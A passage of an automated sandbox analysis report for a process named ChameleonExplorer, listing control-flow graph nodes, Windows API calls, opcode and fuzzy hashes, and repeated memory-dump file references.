                                                                                                            • API String ID: 2962429428-3734761527
                                                                                                            • Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction ID: 6cb70da68469583044ff129c6067d83a83f0578bd1865a4e4d8a2b8c72db1230
                                                                                                            • Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction Fuzzy Hash: 3431283A600B44C9EB11DF39E89036E7364F784BA4F848222EA5D9B7E0CF3CD6448308

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 184 3324dd0-3324dfe 185 3324e04-3324e11 184->185 186 3325039-3325040 184->186 187 3324e13-3324e28 185->187 188 3324e81-3324e8a 185->188 189 3325046-3325058 186->189 190 332517e-3325184 186->190 191 3324e44-3324e53 187->191 192 3324e2a-3324e3a 187->192 188->187 195 3324e8c-3324e99 188->195 193 332505a call 3324850 189->193 194 332505f-3325080 189->194 196 3325186 call 3324b10 190->196 197 332518b-3325193 190->197 201 3324e59-3324e68 191->201 202 3324eec-3324eee 191->202 199 3324e3c-3324e3f 192->199 200 3324e6d-3324e7c 192->200 193->194 204 3325082-332508a 194->204 205 332508c-332509b 194->205 195->187 206 3324e9f-3324eac 195->206 196->197 199->197 200->197 201->197 207 3324ef0 call 3324850 202->207 208 3324ef5-3324eff 202->208 209 33250f2-3325113 204->209 210 33250b0-33250b8 205->210 211 332509d-33250ae 205->211 206->187 212 3324eb2-3324ec5 206->212 207->208 219 3324f94-3324fa0 208->219 220 3324f05-3324f48 208->220 217 3325130-3325142 209->217 218 3325115-3325127 209->218 213 33250ba-33250dc 210->213 214 33250de-33250e0 call 3324a10 210->214 211->209 212->188 215 3324ec7-3324eda Sleep 212->215 221 33250e5-33250ed 213->221 214->221 215->187 222 3324ee0-3324eea Sleep 215->222 227 3325164 217->227 228 3325144-332515b 217->228 218->217 224 3325129 218->224 229 3324fa2-3324fb6 219->229 230 3324fcc-3324fd2 call 3324a10 219->230 225 3324f4a-3324f55 220->225 226 3324f5e-3324f72 220->226 221->197 222->188 224->217 225->226 232 3324f57 225->232 235 3324f74-3324f92 call 3324900 226->235 236 3324fec 226->236 233 3325169-332517c 227->233 228->233 234 332515d-3325162 call 3324900 228->234 237 3324fba-3324fca 229->237 238 3324fb8 229->238 240 3324fd7-3324fdd 230->240 232->226 233->197 234->233 239 3324ff1-3325034 235->239 236->239 237->239 238->237 239->197 240->239 243 3324fdf-3324fe7 240->243 243->197
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 148c655e062c9401b5d54ed2250320394f284ebef5256e8a6baef709daf25847
                                                                                                            • Instruction ID: 9c7fdfb2afa93f0d8d0a8ce604579aa7a726ecd286d0df8b43d058bb79914fd5
                                                                                                            • Opcode Fuzzy Hash: 148c655e062c9401b5d54ed2250320394f284ebef5256e8a6baef709daf25847
                                                                                                            • Instruction Fuzzy Hash: 64B16773601BA086EB16CF29E8D036DFBA8F344B64F588229E7594B794DB78E561C340

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 246 33267f0-33267fc 247 3326817-3326821 246->247 248 3326823 247->248 249 33267fe-3326814 VirtualFree 247->249 250 3326826-33268be 248->250 249->247 250->250 251 33268c4-33268e1 250->251 252 33268e4-3326905 251->252 252->252 253 3326907-3326938 call 3327e20 252->253 256 3326953-332695d 253->256 257 332693a-3326950 VirtualFree 256->257 258 332695f-3326980 256->258 257->256
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 60f5bfc53a8f07829ae122f60ee6bdd8e7a12783feef1ca06ab4112a4912aae6
                                                                                                            • Instruction ID: 7640eef3c55238464e92090c75509511adf095857ad25eb1695f976c7b4fdfb4
                                                                                                            • Opcode Fuzzy Hash: 60f5bfc53a8f07829ae122f60ee6bdd8e7a12783feef1ca06ab4112a4912aae6
                                                                                                            • Instruction Fuzzy Hash: 9F4148F4A81F5096EE05CB81E9A47D96B6ABB05792F85C032E85D5F724EB3CD3A5C300

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemDefaultUILanguage.KERNEL32 ref: 0333070D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultLanguageSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4166810957-0
                                                                                                            • Opcode ID: fbdebada3cab3e68eb1c39c76fbd2d7930b03274351f4ac81c1d286bf1ce653f
                                                                                                            • Instruction ID: e6ee090da30acc22554832ce708b05049f423dafa9c28b7590647318ce76eb3c
                                                                                                            • Opcode Fuzzy Hash: fbdebada3cab3e68eb1c39c76fbd2d7930b03274351f4ac81c1d286bf1ce653f
                                                                                                            • Instruction Fuzzy Hash: D151C13A600B9489DB24EF75D8943DD2B66F785B9CF54A016EA0E8BB58DF74C588C380

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 311 332ac80-332aca4 312 332aca6 311->312 313 332acad-332acfa GetCurrentThreadId 311->313 312->313 314 332ad08 313->314 315 332acfc-332ad06 313->315 316 332ad10-332ad51 314->316 315->316 317 332ad53-332ad5a 316->317 318 332ad5c 316->318 317->318 319 332ad65-332ad6d 317->319 318->319 320 332ad82-332ad89 319->320 321 332ad6f-332ad75 319->321 322 332ad94-332ad9c 320->322 323 332ad8b 320->323 321->320 324 332adb0-332adb7 322->324 325 332ad9e-332adaa call 33271d0 322->325 323->322 326 332adc0 call 332b3c0 324->326 327 332adb9-332adbe call 332abd0 324->327 325->324 333 332adc5-332add2 326->333 327->333
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332ACEA
                                                                                                              • Part of subcall function 0332B3C0: GetCurrentThreadId.KERNEL32 ref: 0332B3F0
                                                                                                              • Part of subcall function 0332B3C0: FreeLibrary.KERNEL32 ref: 0332B4E6
                                                                                                              • Part of subcall function 0332B3C0: ExitProcess.KERNEL32 ref: 0332B53A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 274535261-0
                                                                                                            • Opcode ID: a99cd9dad5f5764cd4f20c1a1b1223305cab0d37967c0085830887904e01cc4c
                                                                                                            • Instruction ID: 1649eb3d2502e682e6a86fb77fe492d780ef1637ab550f57c0e412d604f39f35
                                                                                                            • Opcode Fuzzy Hash: a99cd9dad5f5764cd4f20c1a1b1223305cab0d37967c0085830887904e01cc4c
                                                                                                            • Instruction Fuzzy Hash: 98312332600BD8DAD722DF20EC887DA3BBDF708759F840125DA095B664CF74968AC700

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 0333082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: 282ca0b9e463dd29b21c6dbe21d58bcbf1495809708ea1d844c4ddf7e0550c14
                                                                                                            • Instruction ID: db6ec3da5d1aa4aa15975437c9ac6933e0e25172a34c87a1142c53a25997d506
                                                                                                            • Opcode Fuzzy Hash: 282ca0b9e463dd29b21c6dbe21d58bcbf1495809708ea1d844c4ddf7e0550c14
                                                                                                            • Instruction Fuzzy Hash: 42115736610B6089DB14EF75D8D43DD2B65EB0878CF40601AEA4E4BB48DF39C189C380

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03331581
                                                                                                              • Part of subcall function 033313F0: GetVersion.KERNEL32 ref: 033313F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThreadVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 888907627-0
                                                                                                            • Opcode ID: 02b7317e8150fb308768483fd461c945c5709eb705f731a55198bd03be133458
                                                                                                            • Instruction ID: 4c6bde0f37d685f3f773584ab2fc12404952300aee4251f85bfa821c6afc5fab
                                                                                                            • Opcode Fuzzy Hash: 02b7317e8150fb308768483fd461c945c5709eb705f731a55198bd03be133458
                                                                                                            • Instruction Fuzzy Hash: 7211C578D0175489F702FB62B8C47873BBCBB05314F904619E558AE360EB3C6364CB96

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 373 3324a10-3324a3e call 3324970 VirtualAlloc 376 3324a40-3324a95 373->376 377 3324a97-3324aa1 373->377 378 3324aa4-3324aa9 376->378 377->378
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,033250E5), ref: 03324A33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 5ba0068487a5cd94d616b51fe0c8ca05f1dabbac11d6e963a1fa4065d79c3fe1
                                                                                                            • Instruction ID: 98d20bdfb20f6d33c6c09852972c8f35c6ed5f69433f50e2bd700f81459b8a3f
                                                                                                            • Opcode Fuzzy Hash: 5ba0068487a5cd94d616b51fe0c8ca05f1dabbac11d6e963a1fa4065d79c3fe1
                                                                                                            • Instruction Fuzzy Hash: 1D0169B6702B4182EB02CF5AF9E13667BACB708744F604439AA4C9B324DB398666C340

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 379 3326990-332699c 380 33269b5-33269bc 379->380 381 332699e-33269aa call 33242a0 379->381 382 33269c3-33269cb 380->382 383 33269be call 3325fd0 380->383 381->380 387 33269ee call 33267f0 382->387 388 33269cd-33269e3 VirtualFree 382->388 383->382 390 33269f3-33269f7 387->390 388->387
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 907f4b7569431a7540a699e01e21496b410907f67c6c2524b60fb8b975af7873
                                                                                                            • Instruction ID: 9c8860078121e0cd719be057a62ba92c840d9b1616038f40df213ec0812b18e8
                                                                                                            • Opcode Fuzzy Hash: 907f4b7569431a7540a699e01e21496b410907f67c6c2524b60fb8b975af7873
                                                                                                            • Instruction Fuzzy Hash: FAF0ED78D05A2184FF1AEB12FCE9716AE585B96344FE40015B4685E2A08FBC92C4C741
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
